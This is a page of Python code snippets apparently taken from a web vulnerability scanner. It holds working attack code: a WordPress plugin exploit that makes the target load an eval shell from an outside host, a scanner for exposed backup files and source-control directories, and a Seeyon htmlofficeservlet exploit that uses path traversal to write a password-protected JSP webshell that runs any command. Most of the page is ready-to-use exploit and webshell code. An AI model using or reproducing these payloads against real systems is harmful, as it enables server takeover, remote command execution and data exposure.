コード例 #1
0
        def inner(*args, **kwargs):
            # setting random user agent
            if "headers" not in kwargs.keys():
                kwargs['headers'] = {'User-Agent': get_random_ua()}
            elif 'User-Agent' not in kwargs['headers'].keys():
                kwargs['headers']['User-Agent'] = get_random_ua()

            # setting exclude ssl
            if "verify" not in kwargs.keys():
                kwargs['verify'] = False

            f = getattr(requests, method)
            return f(*args, **kwargs)
コード例 #2
0
def poc(url):
    # url = "http://www.example.org:8080/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org:8080
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc

    # 自定义的shell地址,内容为 <pre>eval($_REQUEST['z']);</pre>
    shellpath = "http://saucer-man.com/aa.txt"
    # 执行的shell命令
    shell = "phpinfo();"

    vulnurl = url + "/wp-admin/admin-post.php?swp_debug=load_options&swp_url={shellpath}&z={shell}".format(
        shellpath=shellpath, shell=shell)
    try:
        print(vulnurl)
        headers = {"User-Agent": get_random_ua()}
        r = request.get(vulnurl,
                        headers=headers,
                        timeout=5,
                        verify=False,
                        allow_redirects=False)
        print(r.status_code)
        print(r.headers)
        print(r.text)
        if r.status_code == 200 and "PHP Version" in r.text:
            return vulnurl
        else:
            return False
    except:
        return False
コード例 #3
0
def bak_scan(url, payloads, result):
    headers = {"User-Agent": get_random_ua()}
    while not payloads.empty():
        payload = payloads.get()
        vulnurl = url + "/" + payload
        try:
            flag = 0
            # 如果是备份文件则不需要下载,只需要head方法获取头部信息即可,否则文件较大会浪费大量的时间
            if 'zip' in payload or 'rar' in payload or 'gz' in payload or 'sql' in payload:
                req = request.head(vulnurl,
                                   headers=headers,
                                   timeout=5,
                                   allow_redirects=False,
                                   verify=False)
                # 404页面 'Content-Type': 'application/octet-stream',
                # zip 'application/x-zip-compressed' 'application/zip'
                # rar 'application/octet-stream'  'application/x-rar-compressed'
                # 采用Content-Type过滤,还是有一定误报
                if req.status_code == 200:
                    if 'html' not in req.headers[
                            'Content-Type'] and 'image' not in req.headers[
                                'Content-Type']:
                        flag = 1
            # 当检验git和svn、hg时则需要验证返回内容,get方法
            else:
                req = request.get(vulnurl,
                                  headers=headers,
                                  timeout=5,
                                  verify=False,
                                  allow_redirects=False)
                if req.status_code == 200:
                    if 'svn' in payload:
                        if 'dir' in req.text and 'svn' in req.text:
                            flag = 1
                    elif 'git' in payload:
                        if 'repository' in req.text:
                            flag = 1
                    elif 'hg' in payload:
                        if 'hg' in req.text:
                            flag = 1
                    elif '/WEB-INF/web.xml' in payload:
                        if 'web-app' in req.text:
                            flag = 1
            if flag == 1:
                result.append(vulnurl)
        except Exception as e:
            # print(e)
            continue
コード例 #4
0
def poc(url):
    # url = "www.example.org/default.html?ct=32&op=92&item=98"
    # --> http://www.example.org
    if url[:4] != "http":
        url = "http://" + url
    o = urlparse(url)
    url = o.scheme + "://" + o.netloc
    headers = {
        "User-Agent":get_random_ua()
        }
    
    # shell_name can modify it yourself
    shell_name="config_db1.jsp"

    shell_url = url + "/seeyon/" + shell_name

    try:
        # just prevent being attacked
        res = request.get(shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False)
        if res.status_code == 200 and ":-)" in res.text:
            return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    except:
        pass

    shell_name = "..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\" + shell_name
    # def_shell content can modufy iy youself
    def_shell = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("fuckxxxx".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>"""
    def_shell = def_shell.encode()
    base_header = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkZUFENXlSUUh3TG9pcVJqaWRnNjYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo="

    payload_head_len = 283 + len(f_base64encode(shell_name))
    payload_shell_len = len(def_shell)
    payload_shell = def_shell + bytes(hashlib.md5(def_shell).hexdigest(), 'utf-8')
    payload_shell_name = f_base64encode(shell_name)
    payload = bytes(base64.b64decode(base_header).decode().replace('355', str(payload_head_len)).replace('666', str(
        payload_shell_len)).replace('qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdeAD5yRQHwLoiqRjidg66',
                                    payload_shell_name), 'utf-8') + payload_shell
    try:
        request.post(url=url + "/seeyon/htmlofficeservlet", data=payload, headers=headers, timeout=5, allow_redirects=False, verify=False)
        res = request.get(url=shell_url, headers=headers, timeout=5, allow_redirects=False, verify=False).text
    except:
        return False

    if ":-)" in res:
        return shell_url+'?pwd=fuckxxxx&cmd=cmd /c whoami'
    else:
        return False